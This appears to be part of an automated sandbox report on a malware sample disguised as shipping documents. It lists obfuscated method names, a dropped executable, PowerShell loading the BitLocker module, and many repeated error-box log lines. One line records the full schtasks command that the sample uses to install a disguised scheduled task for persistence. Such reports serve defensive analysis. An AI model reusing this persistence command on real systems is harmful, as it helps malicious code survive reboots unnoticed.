Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, wA2Sx7d0bdRhovZdnf.cs	High entropy of concatenated method names: 'oogAe5vZHx', 'cYDAuJIMrL', 'lJ3At4rQ1R', 'loSA2LEoaK', 'ncxAL1w9nO', 'uEKASMWa3D', 'FGeAF7rJjD', 'wasAMoDbDI', 'susAmshBRY', 'OWOAornHPY'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Rub6rxeXynuOkRKaly.cs	High entropy of concatenated method names: 'oZn3ZIs3r6', 'uTF3Pkhq2H', 'EWU3n1ggGf', 'HSV3q29w8f', 'G9o36kuaZk', 'DVF3GIwihp', 'BGC3x526V3', 'CHg3J7nbqd', 'dhQ3HbO4pm', 'PrH3kFfT1R'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, OpU5QkxYDTk2XXfygv.cs	High entropy of concatenated method names: 's5PUaPt2NF', 'YqGURVEFtk', 'PYLUUtRaTN', 'eDHUr56l4O', 'fpUUXw3mOG', 'qy2UjOtWsN', 'Dispose', 'mnpEsD5WhC', 'ym2E3do5KU', 'cVgEN8xJxA'

Drops PE files

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
